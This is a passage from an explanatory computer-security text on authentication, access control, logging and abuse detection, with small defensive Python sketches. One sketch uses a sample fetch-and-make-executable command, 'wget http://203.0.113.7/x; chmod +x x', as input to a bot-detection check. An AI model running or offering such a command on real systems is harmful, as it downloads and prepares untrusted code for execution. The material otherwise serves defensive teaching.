do absolutely nothing about it. This is an important implication of
the limitations of accuracy (see 3.7).
7.3 Authentication Factors
There are many ways you can prove your identity to a system. They
may include:
- something you are, like biometric signatures such as the pattern
of capillaries on your retina, your fingerprints, etc.
- something you have, like a token, physical key, or thumb drive
- something you know, like a passphrase or password
- somewhere you are, if you put a GPS device in a computer, or
did direction-finding on transmissions, or simply require a person
to be physically present somewhere to operate the system
- somewhere you can be reached, like a mailing address, network
address, email address, or phone number
At the risk of self-promotion, I want to point out that, to my knowledge,
the last factor has not been explicitly stated in computer security
literature, although it is demonstrated every time a web site emails
you your password, or every time a financial company mails something
to your home.
7.4 Authentication Issues: When, What
Do we authenticate each transaction or command (sudo), or a session
(SSH), or only certain commands (passwd)? What is being authenticated,
the remote system, the agent, or the user?
7.5 The Identity Continuum
Identification can range from fully anonymous to pseudonymous, to
full identification. Ensuring identity can be expensive, and is never
perfect. Think about what you are trying to accomplish. This applies to
cookies from web sites, email addresses, "real names", and so
on.
7.6 Problems Remaining Anonymous
In cyberspace everyone will be anonymous for 15 minutes.
- Graham Greenleaf
What can we learn from anonymizer, mixmaster, tor, and so on? Often
one can de-anonymize. Some people have de-anonymized search queries,
census data, and many other data sets that are supposed to be
anonymous.
7.7 Problems with Identifying People
- Randomly-Chosen Identity
- Fictitious Identity
- Stolen Identity
7.8 Remote Attestation
Knowing that the remote system is a particular program or piece of
hardware is called remote attestation. When I connect securely over
the network to a machine
I believe I have full privileges on, how do I know I'm actually talking
to the machine, and not a similar system controlled by the adversary?
This is usually attempted by hiding an encryption key in some tamper-proof
part of the system, but is vulnerable to all kinds of disclosure and
side-channel attacks, especially if the owner of the remote system
is the adversary.
The most successful example seems to be the satellite television industry,
where they embed cryptographic and software secrets in an inexpensive
smart card with restricted availability, and change them frequently
enough that the resources required to reverse engineer each new card
exceed the value of the data it is protecting. In the satellite TV
industry, there's something they call ECMs (electronic counter-measures),
which are program updates of the form "look at memory location
0xFC, and if it's not 0xFA, then HCF" (Halt and Catch Fire). The
obvious crack is to simply remove that part of the code, but then
you will trigger another check that looks at the code for the first
check, and so on.
The sorts of non-cryptographic self-checks they request the card to
do, such as computing a checksum (such as a CRC) over some memory
locations, are similar to the sorts of protections against reverse
engineering, where the program computes a checksum to detect modifications
to itself.
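A self-check of this kind can be sketched as follows, assuming CRC-32
as the checksum and a byte array standing in for the card's or
program's memory. The region boundaries and contents are made up; the
checks real cards perform are not described here.

```python
import zlib


def region_ok(memory: bytes, start: int, length: int, expected_crc: int) -> bool:
    """Check that a region of memory still has the CRC-32 recorded earlier."""
    return zlib.crc32(memory[start:start + length]) == expected_crc


image = bytearray(b"\x90" * 64)
expected = zlib.crc32(bytes(image[16:32]))   # recorded before distribution
intact = region_ok(bytes(image), 16, 16, expected)

image[20] = 0xCC                             # simulate a patched byte
patched = region_ok(bytes(image), 16, 16, expected)
```

A CRC only detects modification; it is not keyed, so anyone who can
patch the code can also recompute the expected value, which is why such
checks tend to be layered and hidden.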
8 Access Control
8.1 Privilege Escalation
Ideally, all services would be impossible to abuse. Since this is
difficult or impossible, we often restrict access to them, to limit
the potential pool of adversaries. Of course, if some users can do
some things and others can't, this creates the opportunity for the
adversary to perform an unauthorized action, but that's often unavoidable.
For example, you probably want to be able to do things to your computer,
like reformat it and install a new operating system, that you wouldn't
want others to do. You will want your employees to do things an anonymous
Internet user cannot (see 3.4). Thus, many
adversaries want to escalate their privileges to that of some more
powerful user, possibly you. Generally, privilege escalation
attacks refer to techniques that require some level of access above
that of an anonymous remote system, but grant an even higher level
of access, bypassing access controls.
8.2 Physical Access Control
These include locks. I like Medeco, but none are perfect. It's easy
to find guides to lock picking.
8.3 Operating System Access Control: DAC, MAC, RBAC
Discretionary Access Control (DAC) is up to the end-user. They
can choose to let other people write to their files, if they wish,
and the defaults tend to be global. This is how file permissions on
classic Unix and Windows work. A more secure system often involves
Mandatory Access Control (MAC), where the security administrator
sets up the permissions globally. Some MAC types are Type Enforcement
and Domain Type Enforcement. Implementations include SELinux and systrace.
Often they are combined, where the access request has to pass both
tests, meaning that the effective permission set is the intersection
of the MAC and DAC permissions. Another way of looking at
it is that MAC sets the maximum permissions that DAC can give. Role-Based
Access Control (RBAC) could be considered a form of MAC. In RBAC,
there are roles to whom permissions are assigned, and one switches
roles to change permission sets. For example, you might have a security
administrator role, but you don't need that to read email or surf
the web, so you only switch to it when doing security administrator
stuff. This prevents you from accidentally running malware with full
permissions. Unix emulates this with pseudo-users and sudo.
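When MAC and DAC are combined, a request has to pass both tests, which
can be modeled with sets. A minimal sketch; the permission names are
illustrative only:

```python
def effective_permissions(mac_allowed: set, dac_allowed: set) -> set:
    """A request must pass both checks, so only shared permissions survive."""
    return mac_allowed & dac_allowed


mac = {"read", "write"}                 # ceiling set by the administrator
dac = {"read", "write", "execute"}      # what the file's owner chose to grant
effective = effective_permissions(mac, dac)
```

Here the owner granted execute, but MAC never allowed it, so it does
not appear in the effective set.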
9 Secure System Administration
9.1 Change Management
Change management is the combination of proactively declaring
and approving intended changes, and retroactively monitoring the
system for changes, comparing them to the approved changes, and alerting
on and escalating any unapproved changes. Change management is based
on the theory that unapproved changes are potentially bad, and therefore
related to anomaly detection (see 12.1). It
is normally applied to files and databases.
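The retroactive half of change management can be sketched as a
comparison of two snapshots. This assumes each snapshot is a mapping
from file path to some digest of its contents; the function name, paths
and digest strings below are placeholders.

```python
def unapproved_changes(baseline, current, approved):
    """Compare two {path: digest} snapshots and return changes nobody approved."""
    changed = set()
    for path in baseline.keys() | current.keys():
        if baseline.get(path) != current.get(path):
            changed.add(path)               # added, removed, or modified
    return sorted(changed - set(approved))


baseline = {"/etc/passwd": "a1", "/etc/hosts": "b2"}
current = {"/etc/passwd": "a9", "/etc/hosts": "b2", "/tmp/x": "c3"}
alerts = unapproved_changes(baseline, current, approved={"/etc/passwd"})
```

The change to /etc/passwd was declared in advance, so only the
unexpected new file is escalated.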
9.2 Self-Healing Systems
There is a system administration tool called cfengine (http://www.cfengine.org/)
which implements a concept called "self-healing systems", whereby
any changes made on a given machine are automatically reverted to
the (ostensibly correct and secure) state periodically. Any change
to these parameters made on a given system but not in the central
configuration file are considered to be accidents or attacks, and
so if you really want to make a change it has to be done on the centrally-managed
and ostensibly monitored configuration file. You can also implement
similar concepts by using a tool like rsync to manage the contents
of part of the file system.
9.3 Heterogeneous vs. Homogeneous Defenses
Often homogeneous solutions are easier to administer. Having different
systems requires more resources, in training yourself, learning to
use them properly, keeping up with vulnerabilities, and increases
the risk of misconfiguration (assuming you aren't as good at N systems
as you would be at one). But there are cases where heterogeneity is
easier, or where homogeneity is impossible. Maybe a particular OS
you're installing comes with sendmail as the default, and changing
it leads to headaches (or the one you want just isn't available on
it, because it is a proprietary platform). Embedded devices often
have a fixed TCP/IP stack that can't be changed, so if you are to
guard against such things, you must either run only one
kind of software on all Internet-enabled systems, denying yourself
the convenience of all the new network-enabled devices, or you must
break Internet-level connectivity with a firewall and admit impotency
to defend against internal threats (and anyone who can bypass the
perimeter).
10 Logging
10.1 Synchronized Time
It is absolutely vital that your systems have consistent timestamps.
Consistency is more important than accuracy, because you are primarily
going to be comparing logs between your systems. There are a number
of problems comparing timestamps with other systems, including time
zones and the fact that their clocks may be skewed. However, ideally,
you'd want both, so that you could compare if the other systems are
accurate, and so you can make it easier for others to compare their
logs with yours. Thus, the Network Time Protocol (NTP) is vital. My
suggestion is to have one system at every physical location that acts
as the NTP server for the location, so that if the network connections
go down, the site remains consistent. They should all feed into one
server for your administrative domain, and that should connect with
numerous time servers. This also minimizes network traffic and having
a nearby server is almost always better for reducing jitter.
See the SAGE booklet on "Building a Logging Infrastructure".
11 Reports
11.1 Change Reporting
I spend a lot of time reading the same things over and over in security
reports. I'd like to be able to filter things that I decided were
okay last time without tweaking every single security reporting script.
What I want is something that will let me see the changes from day
to day. Ideally, I'd be able to review the complete data, but normally
I read the reports every day and only want to know what has changed
from one day to the next.
11.2 Artificial Ignorance
Being able to specify things that I want to ignore in reports is what
I believe Marcus Ranum termed "artificial ignorance" back around
1994 (described here: http://www.ranum.com/security/computer_security/papers/ai/index.html).
Instead of specifying what I want to see, which is akin to misuse
detection, I want to see anything I haven't already said was okay,
which is anomaly detection. Put another way, what you don't know can
hurt you (see 22.6), which is why "default deny"
is usually a safer access control strategy (see 24.1).
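Artificial ignorance can be sketched as a filter that drops every line
matching a pattern I have already declared okay and reports the rest.
The patterns and log lines below are invented for illustration.

```python
import re


def unexplained(lines, ignore_patterns):
    """Return the log lines that match none of the 'known okay' patterns."""
    compiled = [re.compile(p) for p in ignore_patterns]
    return [ln for ln in lines if not any(rx.search(ln) for rx in compiled)]


ignore = [r"^cron\[\d+\]: session (opened|closed)", r"^ntpd\[\d+\]: "]
log = [
    "cron[311]: session opened for user root",
    "ntpd[42]: time reset +0.2 s",
    "sshd[977]: Accepted password for oracle from 203.0.113.7",
]
report = unexplained(log, ignore)
```

Nothing had to be written about sshd for its line to show up; anything
not yet explained is reported by default.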
11.3 Dead Man's Switch
In some movies, a character has a switch which goes off if they die;
this is known as a dead man's switch, and it can be applied
to software (http://en.wikipedia.org/wiki/Dead_man's_switch#Software_uses).
I want to see if some subsystem has not reported in. If an
adversary overtly disables our system, we are aware that it has been
disabled, and we can assume that something security-relevant occurred
during that time. But if through some oversight on our side, we allow
a system to stop monitoring something, we do not know if anything
has occurred during that time. Therefore, we must be vigilant that
our systems are always monitoring, to avoid that sort of ambiguity,
and we want to know if they are not reporting because of a
misconfiguration or failure. This requires a periodic heartbeat
or system test, and a dead man's switch.
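The heartbeat check can be sketched as follows, assuming each subsystem
records the time of its last report in a table. The source names and
timestamps (in seconds) are made up.

```python
def silent_sources(last_seen, now, max_silence):
    """Return sources whose latest heartbeat is older than max_silence seconds."""
    return sorted(src for src, t in last_seen.items() if now - t > max_silence)


last_seen = {"ids-sensor": 1000.0, "mail-gw": 1290.0, "fileserver": 400.0}
overdue = silent_sources(last_seen, now=1300.0, max_silence=300.0)
```

A source that has never reported at all will not appear in the table,
so every expected source should be registered up front with an initial
timestamp.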
12 Abuse Detection
Doveriai, no proveriai ("trust, but verify")
- Russian Proverb (http://en.wikipedia.org/wiki/Trust,_but_Verify)
It is becoming apparent that there's more to computers than shell
access nowadays. One wants to allow benign email, and stop unsolicited
bulk email. For wikis and blogs, one wants to allow collaboration,
but doesn't want "comment spam". Some still want to read topical
USENET messages, and not read spam (I feel that's a lost cause now).
If you're an ISP, you want to allow customers to do some things but
don't want them spamming or hacking. If you have a public wifi hot-spot,
you'd like people to use it but not abuse it. So I generalized IDS,
anti-virus, and anti-spam as abuse detection.
12.1 Misuse Detection vs. Anomaly Detection
Most intrusion detection systems categorize behavior, making it an
instance of the classification problem (see 3.2).
Generally, there are two kinds of intrusion detection systems, commonly
called misuse detection and anomaly detection. Misuse
detection involves products with signature databases which
indicate bad behavior. By analogy, this is like a cop who is told
to look for guys in white-and-black striped jumpsuits with burlap
sacks with dollar signs printed on them. This is how physical alarm
sensors work; they detect the separation of two objects, or the breaking
of a piece of glass, or some specific thing. The second is called
anomaly detection, which is like a cop who is told to look for "anything
out of the ordinary". The first has more false negatives and fewer
false positives than the second. The first (theoretically) only finds
security-relevant events, whereas the second (theoretically) notes
any major changes. This can play out in operating system security
(as anti-virus and other anti-malware products) or in network security
(as NIDS/IPS). The first is great for vendors; they get to sell you
a subscription to the signature database. The second is virtually
non-existent and probably rather limited in practice (you have to
decide what to measure/quantify in the first place).
In misuse detection, you need to have a good idea of what the adversary
is after, or how they may operate. If you get this guess wrong, your
signature may be completely ineffective; it may minimize false positives
at the risk of false negatives, particularly if the adversary is actually
a script that isn't smart enough to take the bait. In this sense,
misuse detection is a kind of enumerating badness, which means
anything not specifically listed is allowed, and therefore violates
the principle of least privilege (see 24.1).
12.2 Honey Traps
Tart words make no friends; a spoonful of honey will catch more flies
than a gallon of vinegar.
- Benjamin Franklin
Noted security expert Marcus Ranum gave a talk on burglar alarms once
at Usenix Security, and had a lesson that applies to computer security.
He said that when a customer of theirs had an alarm sensor that was
disguised as a jewelry container or a gun cabinet, it was almost always
sure to trick the burglar, and trigger the alarm. Criminals, by and
large, are opportunistic, and when something valuable is offered to
them, they rarely look a gift horse in the mouth. I also recall a
sting operation where a law enforcement agency had a list of criminals
they wanted to locate but who never seemed to be home. They sent winning
sweepstakes tickets to wanted criminals who dutifully showed up to
claim their "prize". So a honey trap may well be the cheapest
and most effective misuse detection mechanism you can employ.
One of the ways to detect spam is to have an email address which should
never receive any email; if any email is received, then it is from
a spammer. These are called spamtraps. Unix systems may have
user accounts which may have guessable passwords and no actual owners,
so they should never have any legitimate logins. I've also heard of
banks which have trap accounts; these tend to be large accounts
which should never have a legitimate transaction; they exist on paper
only. Any transaction on such an account is, by definition, fraudulent
and a sign of a compromised system. One could even go farther and
define a profile of transactions, possibly pseudo-random, any deviation
from which is considered very important to investigate. The advantages
of these types of traps are their extremely low false-positive rate,
and their value as a deterrent to potential adversaries who fear being
caught and punished.
12.3 Tripwires and Booby Traps
Other misuse detection methods involve detecting some common activity
after the intrusion, such as fetching additional tools (outbound TFTP
connections to servers in Eastern Europe are not usually authorized)
or connecting back to the adversary's system to bypass ingress rules
on the firewall (e.g. shoveling application output to a remote X server).
Marcus Ranum once recompiled "ls" to shut down the system if
it was run as root, and he learned to habitually use "echo *"
instead. One may wish to check that it has a controlling tty as well,
so that root-owned scripts do not set it off. In fact, having a root-owned
shell with no controlling tty may be an event worth logging.
12.4 Anti-Malware
This includes anti-virus, anti-trojan, anti-spyware, etc.
12.5 Anti-Spam
There's content filtering (including Bayesian filtering, and signature-based
algorithms), delays of various kinds (graylisting), resource-consumption
responses (teergrubing), blacklisting, micro-payment schemes, SPF,
DKIM, and so on.
12.6 Detecting Automated Peers
People who abuse things for money want to do a lot of it, so frequently
you'll want to try to detect them. You could be doing this for any
of a number of reasons:
- To prevent people from harvesting email addresses for spamming
- To prevent bots from defacing your wiki with links to unrelated sites
- To prevent password-guessing
12.6.1 CAPTCHA
A CAPTCHA is a Completely Automated Turing test to tell Computers
and Humans Apart (http://en.wikipedia.org/wiki/Captcha). Basically
they are problems whose answers are known and which are difficult
for computers to answer directly.
12.6.2 Bot Traps
If you want to stop people from spidering your web site, you may use
something called a "bot trap". This is similar to a CAPTCHA
in that it tries to lure bots into identifying themselves by exploiting
a behavior difference from humans.
12.6.3 Velocity Checks
This is an application of anomaly detection to differentiate computers
and humans, or to differentiate between use and abuse. You simply
look at how many transactions they are doing. You can take a baseline
of what you think a human can do, and trigger any time an entity exceeds
this. Or, you can profile each entity and trigger if they exceed their
normal statistical profile, possibly applying machine learning algorithms
to adjust expectations over time.
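The fixed-baseline variant can be sketched with a sliding window per
entity. The VelocityCheck class, the limit of three events and the
ten-second window are assumptions chosen for the example.

```python
from collections import defaultdict, deque


class VelocityCheck:
    """Flag an entity that exceeds max_events within a sliding window of seconds."""

    def __init__(self, max_events, window):
        self.max_events = max_events
        self.window = window
        self.events = defaultdict(deque)    # entity -> recent timestamps

    def record(self, entity, timestamp):
        """Record one transaction; return True if the entity is over the limit."""
        q = self.events[entity]
        q.append(timestamp)
        while q and timestamp - q[0] >= self.window:
            q.popleft()                     # forget events outside the window
        return len(q) > self.max_events


vc = VelocityCheck(max_events=3, window=10.0)
flags = [vc.record("198.51.100.9", t) for t in (0.0, 1.0, 2.0, 3.0, 20.0)]
```

The fourth transaction within ten seconds trips the check; by the fifth,
the earlier ones have aged out. Profiling each entity would replace the
fixed max_events with a limit learned from its own history.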
12.6.4 Typing Mistakes
The kojoney honey pot (http://kojoney.sourceforge.net/) emulates
an SSH server in order to gather intelligence against adversaries.
Regarding how it separates bots from humans, it says:
We, the humans, are clumsy. The script seeks for SUPR and BACKSPACE
characters in the executed commands.
The script also checks if the intruder tried to change the window
size or tried to forward X11 requests.
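The first heuristic can be sketched as a search for correction
keystrokes in the raw input. This is not kojoney's code; which bytes
stand for those keys depends on the terminal, and the two used here
(0x08 and 0x7f) are an assumption.

```python
BACKSPACE = "\x08"   # assumed byte for the BACKSPACE key
DELETE = "\x7f"      # assumed byte for the delete key


def looks_human(keystrokes: str) -> bool:
    """Heuristic: humans make corrections, scripts usually do not."""
    return BACKSPACE in keystrokes or DELETE in keystrokes


scripted = looks_human("wget http://203.0.113.7/x; chmod +x x\n")
typed = looks_human("cat /etc/passwrd\x7f\x7fd\n")
```

Like any behavioral test, this only works until the bots start
inserting typing mistakes of their own.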
12.7 Host-Based Intrusion Detection
Game over man! Game over!